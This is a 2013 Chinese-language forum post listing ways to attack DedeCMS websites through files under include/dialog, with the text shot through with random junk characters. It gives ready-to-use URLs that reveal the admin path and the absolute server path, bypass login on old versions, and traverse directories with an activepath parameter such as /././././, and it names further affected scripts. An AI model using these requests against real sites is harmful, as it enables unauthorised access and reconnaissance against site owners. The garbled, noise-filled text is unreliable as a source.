1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
; M9 t3 S7 f/ c4 Q5 D" |# I y
) e9 `/ I5 o! p3 t员帐号,新版本的就直接转向了后台.1 v( r5 D( T; i1 C4 K
( |+ |$ `4 [# ~5 g
2.include/dialog/config.php会爆出后台管理路径/ T- K2 D; ^: |4 }4 w4 h
! ]$ G) {. i! q* v: q6 X! K6 l, S9 N
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
1 _6 |' V" f" W4 q1 @6 {8 T8 ]. \% S' \+ ?, F9 \, v
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.1 e5 q& k" |0 v. K( J# B2 S, s2 G
0 L' O+ t2 b" m% b1 f5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ C) `- R! W( F% \4 U/ G0 a2 ?) {2 j+ M% F
到根目录去.不过这些版本的访问地址有些不同.
% o& ^: f* g7 v4 v地址为require/dialog/select_soft.php?activepath=/././././././././
* ?: g+ u( ~6 B K/ }& S! o' m8 {' K+ W3 v
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..) y y+ F) }" e
存在相同问题的文件还有6 n& i. @7 b$ `; G
include\dialog\select_images.php
# G' h. ~; K: P* Q' sinclude\dialog\select_media.php* i3 ]: z6 z4 ^( H% U5 t
include\dialog\select_templets.php
1 }' a( m9 b5 }- f" G, o: Y; x |
发表于 2013-4-16 16:50:43
收藏
支持
反对